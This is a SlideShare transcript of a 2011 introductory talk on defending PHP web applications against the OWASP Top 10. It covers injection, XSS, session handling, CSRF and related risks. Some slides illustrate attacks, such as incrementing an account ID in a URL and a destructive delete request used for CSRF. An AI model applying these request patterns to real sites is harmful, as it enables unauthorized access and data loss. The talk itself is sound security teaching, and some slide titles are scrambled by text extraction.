SCARED STRAIGHT     MITIGATING OWASP TOP 10 WITH PHP
DISCLAIMER
DISCLAIMER•   I am NOT a “security expert"
DISCLAIMER•   I am NOT a “security expert"•   But I know a little about web security
DISCLAIMER•   I am NOT a “security expert"•   But I know a little about web security•   Taken SANS DEV422: Defending Web  ...
DISCLAIMER•   I am NOT a “security expert"•   But I know a little about web security•   Taken SANS DEV422: Defending Web  ...
ASSUMPTIONS
ASSUMPTIONS•   This is an introduction-level talk
ASSUMPTIONS•   This is an introduction-level talk•   You know enough PHP to be dangerous
ASSUMPTIONS•   This is an introduction-level talk•   You know enough PHP to be dangerous•   You’ve heard of some security ...
ASSUMPTIONS•   This is an introduction-level talk•   You know enough PHP to be dangerous•   You’ve heard of some security ...
TALK STRUCTURE
TALK STRUCTURE•   What is the risk?
TALK STRUCTURE•   What is the risk?•   Typical Impact
TALK STRUCTURE•   What is the risk?•   Typical Impact•   How is it exploited?
TALK STRUCTURE•   What is the risk?•   Typical Impact•   How is it exploited?•   How to prevent it when using PHP?
OWASP  http://www.owasp.org
OWASP
OpenWebApplicationSecurityProject
OWASP•   Non-profit focused on improving security of application software•   Focused on awareness of risks and education on...
http://www.owasp.org
OWASP Top 10 (2010)                  Source: Dave Wichers OWASP Top 10 Presentation
INJECTION
INJECTION          SI T?      I             Tricking an application into unintended  HATW                 commands in the ...
CT                            INJECTION                 PA               IM       IC AL                      Technical Imp...
LO                           I TE                               D?   INJECTION                    P             T EX      ...
T   I T?   INJECTION                 EN             R EV         P      TOHOW
T   I T?   INJECTION                 EN             R EV         P      TOHOW                            SYSTEM LEVEL
T   I T?   INJECTION                 EN             R EV         P      TOHOW                            SYSTEM LEVEL     ...
T   I T?   INJECTION                 EN             R EV         P      TOHOW                            SYSTEM LEVEL     ...
T   I T?   INJECTION                 EN             R EV         P      TOHOW                             SYSTEM LEVEL    ...
T   I T?   INJECTION                 EN             R EV         P      TOHOW                             SYSTEM LEVEL    ...
T   I T?   INJECTION                 EN             R EV         P      TOHOW                              SYSTEM LEVEL   ...
T   I T?    INJECTION                 EN             R EV         P      TOHOW                                 SYSTEM LEVE...
T   I T?    INJECTION                 EN             R EV         P      TO OW                                 SYSTEM LEVE...
T   I T?   INJECTION                 EN             R EV         P      TOHOW                           APPLICATION LEVEL ...
T   I T?   INJECTION                 EN             R EV         P      TOHOW                            HTML Injection
T   I T?   INJECTION                 EN             R EV         P      TO          SQL Injection - Prepared StatementsHOW
T   I T?   INJECTION                 EN             R EV         P      TOHOW                            SQL Injection    ...
CROSS SITE SCRIPTING (XSS)
CROSS SITE SCRIPTING (XSS)   ?        IS IT   AT           Malicious data delivered to anW H               innocent users ...
CROSS SITE SCRIPTING (XSS)   ?        IS IT   AT           Malicious data delivered to anW H               innocent users ...
CROSS SITE SCRIPTING (XSS)   ?        IS IT   AT               Malicious data delivered to anW H                   innocen...
CROSS SITE SCRIPTING (XSS)   ?        IS IT   AT               Malicious data delivered to anW H                   innocen...
CROSS SITE SCRIPTING (XSS)   ?        IS IT   AT                 Malicious data delivered to anW H                     inn...
CROSS SITE SCRIPTING (XSS)   ?        IS IT   AT                 Malicious data delivered to anW H                     inn...
CROSS SITE SCRIPTING (XSS)      CT                 PA               IM     Technical Impact:          AL           MODERAT...
CROSS SITE SCRIPTING (XSS)      CT                 PA               IM                 Technical Impact:          AL      ...
CROSS SITE SCRIPTING (XSS)     LO                     I TE                         D?               EXP        SI   T     ...
CROSS SITE SCRIPTING (XSS)     NT              I T?               VE         P   RE      TOHOW                      “Filte...
CROSS SITE SCRIPTING (XSS)     NT             I T?               VE         P   RE      TOHOW
CROSS SITE SCRIPTING (XSS)     NT             I T?               VE         P   RE      TO                   Filter InputHOW
CROSS SITE SCRIPTING (XSS)     NT             I T?               VE         P   RE      TO                        Filter I...
CROSS SITE SCRIPTING (XSS)     NT              I T?               VE         P   RE      TO                         Filter...
CROSS SITE SCRIPTING (XSS)     NT              I T?               VE         P   RE      TO                         Filter...
CROSS SITE SCRIPTING (XSS)     NT             I T?               VE         P   RE      TO                   Escape Output...
CROSS SITE SCRIPTING (XSS)     NT             I T?               VE         P   RE      TO                   Escape Output...
CROSS SITE SCRIPTING (XSS)     NT             I T?               VE         P   RE      TO                   Escape Output...
CROSS SITE SCRIPTING (XSS)     NT             I T?               VE         P   RE      TO                   Escape Output...
CROSS SITE SCRIPTING (XSS)     NT             I T?               VE         P   RE      TO                   Escape Output...
CROSS SITE SCRIPTING (XSS)     NT             I T?               VE         P   RE      TO                     Escape Outp...
CROSS SITE SCRIPTING (XSS)     NT             I T?               VE         P   RE      TO                     Escape Outp...
BROKEN AUTHENTICATIONAND SESSION MANAGEMENT
BROKEN AUTHENTICATION           IT?AND SESSION MANAGEMENT      IS  HAT           Authentication or Sessions areW          ...
BROKEN AUTHENTICATION           IT?AND SESSION MANAGEMENT      IS  HAT           Authentication or Sessions areW          ...
BROKEN AUTHENTICATION           IT?AND SESSION MANAGEMENT      IS  HAT             Authentication or Sessions areW        ...
BROKEN AUTHENTICATION           IT?AND SESSION MANAGEMENT      IS  HAT             Authentication or Sessions areW        ...
BROKEN AUTHENTICATION           IT?AND SESSION MANAGEMENT      IS  HAT                  Authentication or Sessions areW   ...
BROKEN AUTHENTICATION           IT?AND SESSION MANAGEMENT      IS  HAT                  Authentication or Sessions areW   ...
BROKEN AUTHENTICATION                 PA                   AND SESSION MANAGEMENT                    CT              L IM ...
BROKEN AUTHENTICATION                 PA                   AND SESSION MANAGEMENT                    CT              L IM ...
BROKEN AUTHENTICATION                 PA                   AND SESSION MANAGEMENT                    CT              L IM ...
BROKEN AUTHENTICATION                 PA                   AND SESSION MANAGEMENT                    CT              L IM ...
BROKEN AUTHENTICATION                 PA                   AND SESSION MANAGEMENT                    CT              L IM ...
BROKEN AUTHENTICATION                             D?                       AND                         I TE SESSION MANAGE...
BROKEN AUTHENTICATION                   T?                T I SESSION MANAGEMENT             VEAND               N        ...
BROKEN AUTHENTICATION                    T?                 T I SESSION MANAGEMENT              VEAND                N    ...
BROKEN AUTHENTICATION                    T?                 T I SESSION MANAGEMENT              VEAND                N    ...
BROKEN AUTHENTICATION                    T?                 T I SESSION MANAGEMENT              VEAND                N    ...
BROKEN AUTHENTICATION                    T?                 T I SESSION MANAGEMENT              VEAND                N    ...
INSECURE DIGITAL OBJECT REFERENCES
INSECURE DIGITAL OBJECT REFERENCES           SI T?       I   HAT              Users without proper credentials W          ...
INSECURE DIGITAL OBJECT REFERENCES       T                 PAC               IM      Technical Impact:          AL        ...
INSECURE DIGITAL OBJECT REFERENCES       T                 PAC               IM                 Technical Impact:         ...
INSECURE DIGITAL OBJECT REFERENCES                           I TE                               D?                    P LO...
INSECUREIT?       T         DIGITAL OBJECT REFERENCES                 EN             R EV         Use Array Map to        ...
INSECUREIT?       T         DIGITAL OBJECT REFERENCES                 EN               EV                      Use switch(...
CROSS SITE REQUEST FORGERY (CSRF)
CROSS SITE REQUEST FORGERY (CSRF)          SI T?      I  HAT              Victims browser is tricked into issuing aW      ...
CROSS SITE REQUEST FORGERY (CSRF)          SI T?      I  HAT              Victims browser is tricked into issuing aW      ...
CROSS SITE REQUEST FORGERY (CSRF)        T                 PAC               IM      Technical Impact:          AL        ...
CROSS SITE REQUEST FORGERY (CSRF)        T                 PAC               IM                  Technical Impact:        ...
CROSS SITE REQUEST FORGERY (CSRF)        T                 PAC               IM                  Technical Impact:        ...
CROSS SITE REQUEST FORGERY (CSRF)        T                 PAC               IM                  Technical Impact:        ...
CROSS SITE REQUEST FORGERY (CSRF)        T                 PAC               IM                  Technical Impact:        ...
CROSS SITE REQUEST FORGERY (CSRF)        T                 PAC               IM                  Technical Impact:        ...
CROSS SITE REQUEST FORGERY (CSRF)                           I TE                               D?                    P LO ...
CROSS SITE REQUEST FORGERY (CSRF)                           I TE                               D?                    P LO ...
CROSS SITE REQUEST FORGERY (CSRF)                           I TE                               D?                    P LO ...
CROSS SITE REQUEST FORGERY (CSRF)                           I TE                               D?                    P LO ...
CROSS SITE REQUEST FORGERY (CSRF)        T I T?                 EN             R EV         P      TOHOW                  ...
CROSS SITE REQUEST FORGERY (CSRF)        T I T?                 EN             R EV         P      TOHOW                  ...
CROSS SITE REQUEST FORGERY (CSRF)        T I T?                 EN             R EV         P      TOHOW                  ...
CROSS SITE REQUEST FORGERY (CSRF)        T I T?                 EN             R EV         P      TOHOW                  ...
CROSS SITE REQUEST FORGERY (CSRF)        T I T?                 EN             R EV         P      TOHOW                  ...
CROSS SITE REQUEST FORGERY (CSRF)        T I T?                 EN             R EV         P      TOHOW                  ...
CROSS SITE REQUEST FORGERY (CSRF)        T I T?                 EN             R EV         P      TOHOW                  ...
CROSS SITE REQUEST FORGERY (CSRF)        T I T?                 EN             R EV         P      TOHOW                  ...
SECURITY MISCONFIGURATION
SECURITY MISCONFIGURATION          SI T?        I    HAT       Running web applications on a secure foundationW
SECURITY MISCONFIGURATION          SI T?        I    HAT       Running web applications on a secure foundationW           ...
SECURITY MISCONFIGURATION              T                 PAC               IM      Technical Impact:          AL          ...
SECURITY MISCONFIGURATION              T                 PAC               IM                Technical Impact:          AL...
SECURITY MISCONFIGURATION              T                 PAC               IM                Technical Impact:          AL...
SECURITY MISCONFIGURATION              T                 PAC               IM                Technical Impact:          AL...
SECURITY MISCONFIGURATION              T                 PAC               IM                Technical Impact:          AL...
SECURITY MISCONFIGURATION                           I TE                               D?                    P LO         ...
SECURITY MISCONFIGURATION            T I T?                 EN             R EV         P      TOHOW
SECURITY MISCONFIGURATION            T I T?                 EN             R EV         P      TOHOW                      ...
SECURITY MISCONFIGURATION            T I T?                 EN             R EV         P      TO OWKU ITH      D         ...
SECURITY MISCONFIGURATION            T I T?                 EN             R EV         P      TOHOW                      ...
SECURITY MISCONFIGURATION            T I T?                 EN             R EV         P      TOHOW                      ...
INSECURE CRYPTOGRAPHIC STORAGE
INSECURE CRYPTOGRAPHIC STORAGE          SI T?      I           Incorrectly storing and transmitting  HATW                 ...
INSECURE CRYPTOGRAPHIC STORAGE          SI T?      I           Incorrectly storing and transmitting  HATW                 ...
INSECURE CRYPTOGRAPHIC STORAGE          SI T?      I  HAT                What is considered secure data at KU?W           ...
INSECURE CRYPTOGRAPHIC STORAGE          SI T?      I  HAT                What is considered secure data at KU?W           ...
INSECURE CRYPTOGRAPHIC STORAGE       T                 PAC               IM       IC AL           Technical Impact:T YPSEV...
INSECURE CRYPTOGRAPHIC STORAGE       T                 PAC               IM       IC AL                      Technical Imp...
INSECURE CRYPTOGRAPHIC STORAGE       T                 PAC               IM       IC AL                Business Impacts:T ...
INSECURE CRYPTOGRAPHIC STORAGE                           I TE                               D?                    P LO    ...
INSECURE? CRYPTOGRAPHIC STORAGE       T IT                 EN             R EV         P      TOHOW
INSECURE? CRYPTOGRAPHIC STORAGE       T IT                 EN             R EV         P      TOHOW                Identif...
INSECURE? CRYPTOGRAPHIC STORAGE       T IT                 EN             R EV         P      TOHOW                Identif...
INSECURE? CRYPTOGRAPHIC STORAGE       T IT                 EN             R EV         P      TOHOW                Identif...
INSECURE? CRYPTOGRAPHIC STORAGE       T IT                 EN             R EV         P      TOHOW                Identif...
FAILURE TO RESTRICT URL ACCESS
FAILURE TO RESTRICT URL ACCESS          SI T?      I  HAT             Unauthorized users can view private pagesW          ...
FAILURE TO RESTRICT URL ACCESS            T                 PAC               IM      Technical Impact:          AL       ...
FAILURE TO RESTRICT URL ACCESS            T                 PAC               IM                Technical Impact:         ...
FAILURE TO RESTRICT URL ACCESS                           I TE                               D?                    P LO    ...
FAILURE TO RESTRICT URL ACCESS                           I TE                               D?                    P LO    ...
FAILURE TO RESTRICT URL ACCESS                           I TE                               D?                    P LO    ...
FAILURE TO RESTRICT URL ACCESS                           I TE                               D?                    P LO    ...
FAILURE TO RESTRICT URL ACCESS                           I TE                               D?                    P LO    ...
FAILURE ?TO RESTRICT URL ACCESS           T IT                 EN             R EV         P      TO              Check cr...
FAILURE ?TO RESTRICT URL ACCESS           T IT                 EN             R EV         P      TO                Check ...
FAILURE ?TO RESTRICT URL ACCESS           T IT                 EN             R EV         P      TO                Check ...
INSUFFICIENT TRANSPORT      LAYER PROTECTION
INSUFFICIENT TRANSPORT LAYER PROTECTION           SI T?       I   HAT W
INSUFFICIENT TRANSPORT LAYER PROTECTION           SI T?       I           Sending confidential data over   HAT W
INSUFFICIENT TRANSPORT LAYER PROTECTION           SI T?       I           Sending confidential data over   HAT W           ...
INSUFFICIENT TRANSPORT LAYER PROTECTION           SI T?       I             Sending confidential data over   HAT W         ...
INSUFFICIENT TRANSPORT LAYER PROTECTION           SI T?       I                Sending confidential data over   HAT W      ...
INSUFFICIENT TRANSPORT LAYER PROTECTION           SI T?       I                Sending confidential data over   HAT W      ...
INSUFFICIENT TRANSPORT LAYER PROTECTION           SI T?       I                Sending confidential data over   HAT W      ...
INSUFFICIENT TRANSPORT LAYER PROTECTION           SI T?       I                Sending confidential data over   HAT W      ...
INSUFFICIENT TRANSPORT LAYER PROTECTION           SI T?       I                Sending confidential data over   HAT W      ...
INSUFFICIENT TRANSPORT LAYER PROTECTION           SI T?       I                Sending confidential data over   HAT W      ...
INSUFFICIENT TRANSPORT LAYER PROTECTION                    CT                 PA               IM        Technical Impact:...
INSUFFICIENT TRANSPORT LAYER PROTECTION                    CT                 PA               IM              Technical I...
INSUFFICIENT ?TRANSPORT LAYER PROTECTION          T ED           I                    P LO             T EX      I SIHOW  ...
INSUFFICIENT ?TRANSPORT LAYER PROTECTION          T ED                      OI                    PL             T EX     ...
INSUFFICIENT ?TRANSPORT LAYER PROTECTION          T ED           I                    P LO             T EX      I SIHOW
INSUFFICIENT ?TRANSPORT LAYER PROTECTION          T ED           I                    P LO             T EX      I SIHOW  ...
INSUFFICIENT ?TRANSPORT LAYER PROTECTION          T ED           I                    P LO             T EX      I SIHOW  ...
INSUFFICIENT ?TRANSPORT LAYER PROTECTION          T ED           I                    P LO             T EX      I SIHOW  ...
INSUFFICIENT ?TRANSPORT LAYER PROTECTION          T ED           I                    P LO             T EX      I SIHOW  ...
INSUFFICIENT ?TRANSPORT LAYER PROTECTION          T ED           I                    P LO             T EX      I SIHOW  ...
INSUFFICIENT ?TRANSPORT LAYER PROTECTION          T ED           I                    P LO             T EX      I SIHOW
INSUFFICIENT ?TRANSPORT LAYER PROTECTION          T ED           I                    P LO             T EX      I SIHOW  ...
INSUFFICIENT ?TRANSPORT LAYER PROTECTION          T ED           I                    P LO             T EX      I SIHOW  ...
INSUFFICIENT ?TRANSPORT LAYER PROTECTION          T ED           I                    P LO             T EX      I SIHOW  ...
INSUFFICIENT ?TRANSPORT LAYER PROTECTION          T ED           I                    P LO             T EX      I SIHOW  ...
INSUFFICIENT TRANSPORT LAYER PROTECTION           I T?                   T                 EN             R EV         P  ...
INSUFFICIENT TRANSPORT LAYER PROTECTION           I T?                   T                 EN             R EV         P  ...
INSUFFICIENT TRANSPORT LAYER PROTECTION           I T?                   T                 EN             R EV         P  ...
INSUFFICIENT TRANSPORT LAYER PROTECTION           I T?                   T                 EN             R EV         P  ...
INSUFFICIENT TRANSPORT LAYER PROTECTION           I T?                   T                 EN             R EV         P  ...
INSUFFICIENT TRANSPORT LAYER PROTECTION           I T?                   T                 EN             R EV         P  ...
INSUFFICIENT TRANSPORT LAYER PROTECTION           I T?                   T                 EN             R EV         P  ...
INSUFFICIENT TRANSPORT LAYER PROTECTION           I T?                   T                 EN             R EV         P  ...
INSUFFICIENT TRANSPORT LAYER PROTECTION           I T?                   T                 EN             R EV         P  ...
INSUFFICIENT TRANSPORT LAYER PROTECTION           I T?                   T                 EN             R EV         P  ...
INSUFFICIENT TRANSPORT LAYER PROTECTION           I T?                   T                 EN             R EV         P  ...
INSUFFICIENT TRANSPORT LAYER PROTECTION           I T?                   T                 EN             R EV         P  ...
INSUFFICIENT TRANSPORT LAYER PROTECTION           I T?                   T                 EN             R EV         P  ...
UNVALIDATED REDIRECTS        AND FORWARDS
UNVALIDATED REDIRECTS AND FORWARDS          SI T?      I  HATW                   URL Redirects built by the web applicatio...
UNVALIDATED REDIRECTS AND FORWARDS                    CT                 PA               IM              Technical Impact...
UNVALIDATED REDIRECTS AND FORWARDS         TE           D?                         I                    P LO             T...
UNVALIDATED REDIRECTS AND FORWARDS          I T?                   T                 EN             R EV         P      TO...
UNVALIDATED REDIRECTS AND FORWARDS          I T?                   T                 EN             R EV         Use Array...
Questions?
My Challenge to you               Read the OWASP Wiki               http://www.owasp.org                  Review your code...
SourcesOWASP Sources:- OWASP Application Security Verification Standard Project. <http://www.owasp.org/index.php/ASVS>- OWA...
Upcoming SlideShare
Loading in...5
×

Scared Straight: Mitigating OWASP Top 10 with PHP

15,733

Published on

Overview of OWASP and its Top 10 Security Vulnerabilities. Strategies for protecting against common web application security vulnerabilities.

Presented at the January 2011 KU Web Developers meeting.

Published in: Technology
0 Comments
5 Likes
Statistics
Notes
  • Be the first to comment

No Downloads
Views
Total Views
15,733
On Slideshare
0
From Embeds
0
Number of Embeds
2
Actions
Shares
0
Downloads
0
Comments
0
Likes
5
Embeds 0
No embeds

No notes for slide

Scared Straight: Mitigating OWASP Top 10 with PHP

  1. 1. SCARED STRAIGHT MITIGATING OWASP TOP 10 WITH PHP
  2. 2. DISCLAIMER
  3. 3. DISCLAIMER• I am NOT a “security expert"
  4. 4. DISCLAIMER• I am NOT a “security expert"• But I know a little about web security
  5. 5. DISCLAIMER• I am NOT a “security expert"• But I know a little about web security• Taken SANS DEV422: Defending Web Application Security Essentials
  6. 6. DISCLAIMER• I am NOT a “security expert"• But I know a little about web security• Taken SANS DEV422: Defending Web Application Security Essentials• I don’t know everything
  7. 7. ASSUMPTIONS
  8. 8. ASSUMPTIONS• This is an introduction-level talk
  9. 9. ASSUMPTIONS• This is an introduction-level talk• You know enough PHP to be dangerous
  10. 10. ASSUMPTIONS• This is an introduction-level talk• You know enough PHP to be dangerous• You’ve heard of some security vulns
  11. 11. ASSUMPTIONS• This is an introduction-level talk• You know enough PHP to be dangerous• You’ve heard of some security vulns• Again, I don’t know everything
  12. 12. TALK STRUCTURE
  13. 13. TALK STRUCTURE• What is the risk?
  14. 14. TALK STRUCTURE• What is the risk?• Typical Impact
  15. 15. TALK STRUCTURE• What is the risk?• Typical Impact• How is it exploited?
  16. 16. TALK STRUCTURE• What is the risk?• Typical Impact• How is it exploited?• How to prevent it when using PHP?
  17. 17. OWASP http://www.owasp.org
  18. 18. OWASP
  19. 19. OpenWebApplicationSecurityProject
  20. 20. OWASP• Non-profit focused on improving security of application software• Focused on awareness of risks and education on mitigating those risks• Kansas City chapter meets every other month • Next meeting: Thursday, February 10, 2011 at Johnson County Community College • Free! No registration required, but RSVPs appreciated
  21. 21. http://www.owasp.org
  22. 22. OWASP Top 10 (2010) Source: Dave Wichers OWASP Top 10 Presentation
  23. 23. INJECTION
  24. 24. INJECTION SI T? I Tricking an application into unintended HATW commands in the data sent to an interpreter -Interpreter--- -Injection--- Database SQL Injection Shell Command Injection File System File Injection/Inclusion PHP PHP Injection
  25. 25. CT INJECTION PA IM IC AL Technical Impact: SEVERET YP Entire database read or modified Access files on the filesystem Uses a programs elevated privileges to carry out unauthorized execution
  26. 26. LO I TE D? INJECTION P T EX I SIHOW Source: Dave Wichers OWASP Top 10 Presentation
  27. 27. T I T? INJECTION EN R EV P TOHOW
  28. 28. T I T? INJECTION EN R EV P TOHOW SYSTEM LEVEL
  29. 29. T I T? INJECTION EN R EV P TOHOW SYSTEM LEVEL Limit access rights of your application accounts
  30. 30. T I T? INJECTION EN R EV P TOHOW SYSTEM LEVEL Limit access rights of your application accounts OS user and database accounts
  31. 31. T I T? INJECTION EN R EV P TOHOW SYSTEM LEVEL Limit access rights of your application accounts OS user and database accounts Limit attack vectors
  32. 32. T I T? INJECTION EN R EV P TOHOW SYSTEM LEVEL Limit access rights of your application accounts OS user and database accounts Limit attack vectors Sandbox execution
  33. 33. T I T? INJECTION EN R EV P TOHOW SYSTEM LEVEL Limit access rights of your application accounts OS user and database accounts Limit attack vectors Sandbox execution Firewall web-facing machine
  34. 34. T I T? INJECTION EN R EV P TOHOW SYSTEM LEVEL Limit access rights of your application accounts OS user and database accounts Limit attack vectors Sandbox execution Firewall web-facing machine Close unused ports and services
  35. 35. T I T? INJECTION EN R EV P TO OW SYSTEM LEVELKU ITH D Limit access rights of your application accounts OES T OS user and database accounts HIS F OR YO Limit attack vectors Sandbox execution Firewall web-facing machine Close unused ports and services U
  36. 36. T I T? INJECTION EN R EV P TOHOW APPLICATION LEVEL “Filter Input, Escape Output” Examples: HTML SQL / DATABASE
  37. 37. T I T? INJECTION EN R EV P TOHOW HTML Injection
  38. 38. T I T? INJECTION EN R EV P TO SQL Injection - Prepared StatementsHOW
  39. 39. T I T? INJECTION EN R EV P TOHOW SQL Injection Source: http://xkcd.com/327/
  40. 40. CROSS SITE SCRIPTING (XSS)
  41. 41. CROSS SITE SCRIPTING (XSS) ? IS IT AT Malicious data delivered to anW H innocent users browser
  42. 42. CROSS SITE SCRIPTING (XSS) ? IS IT AT Malicious data delivered to anW H innocent users browser Single Request Exploit
  43. 43. CROSS SITE SCRIPTING (XSS) ? IS IT AT Malicious data delivered to anW H innocent users browser Single Request Exploit Specially crafted URL injecting JavaScript or other defacement code
  44. 44. CROSS SITE SCRIPTING (XSS) ? IS IT AT Malicious data delivered to anW H innocent users browser Single Request Exploit Specially crafted URL injecting JavaScript or other defacement code Persistent Request Exploit
  45. 45. CROSS SITE SCRIPTING (XSS) ? IS IT AT Malicious data delivered to anW H innocent users browser Single Request Exploit Specially crafted URL injecting JavaScript or other defacement code Persistent Request Exploit Saved in the file itself or more commonly in a database
  46. 46. CROSS SITE SCRIPTING (XSS) ? IS IT AT Malicious data delivered to anW H innocent users browser Single Request Exploit Specially crafted URL injecting JavaScript or other defacement code Persistent Request Exploit Saved in the file itself or more commonly in a database Delivered to all visitors just by visiting the page
  47. 47. CROSS SITE SCRIPTING (XSS) CT PA IM Technical Impact: AL MODERATE ICT YP
  48. 48. CROSS SITE SCRIPTING (XSS) CT PA IM Technical Impact: AL MODERATE ICT YP Steal stored browser data... Session IDs & cookies Account numbers Usernames Deface website Redirect user to phishing or malware site
  49. 49. CROSS SITE SCRIPTING (XSS) LO I TE D? EXP SI T IHOW Source: Dave Wichers OWASP Top 10 Presentation
  50. 50. CROSS SITE SCRIPTING (XSS) NT I T? VE P RE TOHOW “Filter Input, Escape Output” Validate / Sanitize user input Escape user input sent to a Database or the Browser
  51. 51. CROSS SITE SCRIPTING (XSS) NT I T? VE P RE TOHOW
  52. 52. CROSS SITE SCRIPTING (XSS) NT I T? VE P RE TO Filter InputHOW
  53. 53. CROSS SITE SCRIPTING (XSS) NT I T? VE P RE TO Filter InputHOW Use PHP filter_* methods
  54. 54. CROSS SITE SCRIPTING (XSS) NT I T? VE P RE TO Filter InputHOW Use PHP filter_* methods http://www.php.net/manual/en/ref.filter.php
  55. 55. CROSS SITE SCRIPTING (XSS) NT I T? VE P RE TO Filter InputHOW Use PHP filter_* methods http://www.php.net/manual/en/ref.filter.php
  56. 56. CROSS SITE SCRIPTING (XSS) NT I T? VE P RE TO Escape OutputHOW
  57. 57. CROSS SITE SCRIPTING (XSS) NT I T? VE P RE TO Escape OutputHOW htmlentities() ???
  58. 58. CROSS SITE SCRIPTING (XSS) NT I T? VE P RE TO Escape OutputHOW htmlentities() ???
  59. 59. CROSS SITE SCRIPTING (XSS) NT I T? VE P RE TO Escape OutputHOW htmlentities() ???
  60. 60. CROSS SITE SCRIPTING (XSS) NT I T? VE P RE TO Escape OutputHOW htmlentities() ??? MEH
  61. 61. CROSS SITE SCRIPTING (XSS) NT I T? VE P RE TO Escape OutputHOW http://htmlpurifier.org/
  62. 62. CROSS SITE SCRIPTING (XSS) NT I T? VE P RE TO Escape OutputHOW http://htmlpurifier.org/
  63. 63. BROKEN AUTHENTICATIONAND SESSION MANAGEMENT
  64. 64. BROKEN AUTHENTICATION IT?AND SESSION MANAGEMENT IS HAT Authentication or Sessions areW improperly implemented
  65. 65. BROKEN AUTHENTICATION IT?AND SESSION MANAGEMENT IS HAT Authentication or Sessions areW improperly implemented HTTP is “stateless”
  66. 66. BROKEN AUTHENTICATION IT?AND SESSION MANAGEMENT IS HAT Authentication or Sessions areW improperly implemented HTTP is “stateless” HTTP sends credentials with every request
  67. 67. BROKEN AUTHENTICATION IT?AND SESSION MANAGEMENT IS HAT Authentication or Sessions areW improperly implemented HTTP is “stateless” HTTP sends credentials with every request Credentials are usually a Session ID
  68. 68. BROKEN AUTHENTICATION IT?AND SESSION MANAGEMENT IS HAT Authentication or Sessions areW improperly implemented HTTP is “stateless” HTTP sends credentials with every request Credentials are usually a Session ID Attack is possible when attacker gets a valid Session ID
  69. 69. BROKEN AUTHENTICATION IT?AND SESSION MANAGEMENT IS HAT Authentication or Sessions areW improperly implemented HTTP is “stateless” HTTP sends credentials with every request Credentials are usually a Session ID Attack is possible when attacker gets a valid Session ID Remember Firesheep?
  70. 70. BROKEN AUTHENTICATION PA AND SESSION MANAGEMENT CT L IM Technical Impact: CA SEVERE IT YP
  71. 71. BROKEN AUTHENTICATION PA AND SESSION MANAGEMENT CT L IM Technical Impact: CA SEVERE IT YP An attacker might be able to...
  72. 72. BROKEN AUTHENTICATION PA AND SESSION MANAGEMENT CT L IM Technical Impact: CA SEVERE IT YP An attacker might be able to... Login without a valid password
  73. 73. BROKEN AUTHENTICATION PA AND SESSION MANAGEMENT CT L IM Technical Impact: CA SEVERE IT YP An attacker might be able to... Login without a valid password Change another user’s personal info
  74. 74. BROKEN AUTHENTICATION PA AND SESSION MANAGEMENT CT L IM Technical Impact: CA SEVERE IT YP An attacker might be able to... Login without a valid password Change another user’s personal info Assume another user’s identity by just clicking a link
  75. 75. BROKEN AUTHENTICATION D? AND I TE SESSION MANAGEMENT P LO T EX I SIHOW Source: Dave Wichers OWASP Top 10 Presentation
  76. 76. BROKEN AUTHENTICATION T? T I SESSION MANAGEMENT VEAND N P RE TOHOW Rely on strong authentication and session management controls Integrate Shibboleth into your application
  77. 77. BROKEN AUTHENTICATION T? T I SESSION MANAGEMENT VEAND N P RE TOHOW Proper Session Storage Default config stores sessions in a global temp directory
  78. 78. BROKEN AUTHENTICATION T? T I SESSION MANAGEMENT VEAND N P RE TOHOW Proper Session Regeneration Always run session_regenerate_id() after an escalation in authentication/authorization
  79. 79. BROKEN AUTHENTICATION T? T I SESSION MANAGEMENT VEAND N P RE TO Proper Session cookie handlingHOW Only allow session cookies over secure connections Only allow session cookies over HTTP (not JavaScript) Only allow session IDs in cookies (not in the URL)
  80. 80. BROKEN AUTHENTICATION T? T I SESSION MANAGEMENT VEAND N P RE TO Use HTTPSHOW NEVER deliver unencrypted network traffic when in HTTPS http://test.ku.edu/page2.php ==> http://webmedia.ku.edu/jquery.js https://test.ku.edu/page2.php ==> https://webmedia.ku.edu/jquery.js
  81. 81. INSECURE DIGITAL OBJECT REFERENCES
  82. 82. INSECURE DIGITAL OBJECT REFERENCES SI T? I HAT Users without proper credentials W can view secure data Do any users have only partial access to certain types of system data?
  83. 83. INSECURE DIGITAL OBJECT REFERENCES T PAC IM Technical Impact: AL MODERATE ICT YP
  84. 84. INSECURE DIGITAL OBJECT REFERENCES T PAC IM Technical Impact: AL MODERATE ICT YP Depends on the value of the secure data Flaws can compromise all data referenced by an insecure object
  85. 85. INSECURE DIGITAL OBJECT REFERENCES I TE D? P LO T EX I SIHOW User clicks link “My Account” User accesses “My Account” page at URL: http://mybank.com/account/2055 User increments parameter in the URL: http://mybank.com/account/2056 User is granted access
  86. 86. INSECUREIT? T DIGITAL OBJECT REFERENCES EN R EV Use Array Map to P Obfuscate URL Parameters TOHOW
  87. 87. INSECUREIT? T DIGITAL OBJECT REFERENCES EN EV Use switch() to test for valid values P R TOHOW
  88. 88. CROSS SITE REQUEST FORGERY (CSRF)
  89. 89. CROSS SITE REQUEST FORGERY (CSRF) SI T? I HAT Victims browser is tricked into issuing aW command to a vulnerable web application
  90. 90. CROSS SITE REQUEST FORGERY (CSRF) SI T? I HAT Victims browser is tricked into issuing aW command to a vulnerable web application HTTP is “stateless” - Credentials are included with every request If the user visits another website while still authenticated... Any request back to the application is considered authentic
  91. 91. CROSS SITE REQUEST FORGERY (CSRF) T PAC IM Technical Impact: AL MODERATE ICT YP
  92. 92. CROSS SITE REQUEST FORGERY (CSRF) T PAC IM Technical Impact: AL MODERATE ICT YP What if a hacker could steer your mouse and get you to click on links in your online banking application?
  93. 93. CROSS SITE REQUEST FORGERY (CSRF) T PAC IM Technical Impact: AL MODERATE ICT YP What if a hacker could steer your mouse and get you to click on links in your online banking application? What could they make you do?
  94. 94. CROSS SITE REQUEST FORGERY (CSRF) T PAC IM Technical Impact: AL MODERATE ICT YP What if a hacker could steer your mouse and get you to click on links in your online banking application? What could they make you do? Make Transactions?
  95. 95. CROSS SITE REQUEST FORGERY (CSRF) T PAC IM Technical Impact: AL MODERATE ICT YP What if a hacker could steer your mouse and get you to click on links in your online banking application? What could they make you do? Make Transactions? Close Accounts?
  96. 96. CROSS SITE REQUEST FORGERY (CSRF) T PAC IM Technical Impact: AL MODERATE ICT YP What if a hacker could steer your mouse and get you to click on links in your online banking application? What could they make you do? Make Transactions? Close Accounts? Change Password?
  97. 97. CROSS SITE REQUEST FORGERY (CSRF) I TE D? P LO T EX I SIHOW A vulnerable web application allows destructive actions (INSERT, UPDATE, DELETE) when using $_GET http://mydomain.com/file.php?action=delete&id=12345
